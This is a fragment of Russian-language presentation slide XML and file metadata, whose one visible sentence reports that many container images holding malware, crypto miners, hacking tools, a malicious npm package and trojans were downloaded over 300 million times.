              <a:rPr b="0" lang="ru-RU" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="222222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были классифицированы как вредоносные или потенциально опасные из-за наличия в их составе вредоносных программ, майнеров криптовалюты, хакерских инструментов, вредоносного пакета npm  и троянских приложений. Все эти образы были загружены более 300 000 000 раз.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7" name="Рисунок 33" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11740680" y="11489760"/>
            <a:ext cx="6702480" cy="4820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2619</TotalTime>
  <Application>LibreOffice/5.3.6.1$Linux_X86_64 LibreOffice_project/30$Build-1</Application>
  <Words>2024</Words>
  <Paragraphs>180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2025-04-01T17:07:51Z</dcterms:created>
  <dc:creator>Светлана Назаренко</dc:creator>
  <dc:description/>
  <dc:language>ru-RU</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-12T21:11:06Z</dcterms:modified>
  <cp:revision>102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Произвольный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